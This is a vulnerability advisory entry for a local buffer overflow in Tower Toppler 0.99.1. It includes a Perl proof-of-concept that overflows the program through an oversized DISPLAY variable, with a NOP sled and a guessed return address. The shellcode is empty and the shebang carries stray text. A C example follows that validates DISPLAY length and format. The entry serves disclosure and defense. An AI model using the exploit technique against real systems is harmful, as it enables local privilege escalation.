Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability

ID SSV:76140
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


It has been reported that a buffer overflow exists in Tower Toppler. A local user may be able to exploit this issue to execute code with the privileges of the toppler program.

#!/usr/bin/perl playing a game
#hi bob
$len = 1024;
$ret = 0xbfbffd31;
$nop = "\x90";
$offset = 0;
$shellcode = "";    # payload bytes are missing from the page

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;

$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

local($ENV{'EGG'}) = $buffer;
local($ENV{'DISPLAY'}) = $new_ret x 64;

exec("toppler 2>/dev/null");
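
The overflow described above is driven by the DISPLAY environment variable, which the script sets to 256 bytes of binary data. The following is an added example, not Tower Toppler's code or its fix: a program can validate and bound DISPLAY before copying it into a fixed-size buffer. The names copy_display and DISPLAY_MAX, and the accepted character set, are assumptions made for this illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256  /* assumed buffer size for this example */

/* Hypothetical helper: accept only [host]:display[.screen] and copy it
 * into dst only when the whole string, including its NUL, fits. */
int copy_display(char *dst, size_t dstlen, const char *src)
{
    if (dst == NULL || dstlen == 0) return -1;
    dst[0] = '\0';                        /* dst is a valid string on failure */
    if (src == NULL) return -1;
    const char *end = memchr(src, '\0', dstlen);   /* look at dstlen bytes at most */
    if (end == NULL || end == src) return -1;      /* too long, or empty */
    size_t n = (size_t)(end - src);
    const char *colon = strrchr(src, ':');
    if (colon == NULL || !isdigit((unsigned char)colon[1])) return -1;
    for (const char *h = src; h < colon; h++)      /* host part: no raw binary */
        if (!isalnum((unsigned char)*h) && strchr(".-_/:[]", *h) == NULL)
            return -1;
    const char *p = colon + 1;
    while (isdigit((unsigned char)*p)) p++;        /* display number */
    if (*p == '.') {                               /* optional screen number */
        p++;
        if (!isdigit((unsigned char)*p)) return -1;
        while (isdigit((unsigned char)*p)) p++;
    }
    if (*p != '\0') return -1;                     /* trailing junk */
    memcpy(dst, src, n + 1);                       /* n + 1 <= dstlen, checked above */
    return 0;
}

int main(void)
{
    char display[DISPLAY_MAX];
    if (copy_display(display, sizeof display, getenv("DISPLAY")) != 0) {
        fputs("refusing malformed or oversized DISPLAY\n", stderr);
        return 1;
    }
    printf("using display %s\n", display);
    return 0;
}
```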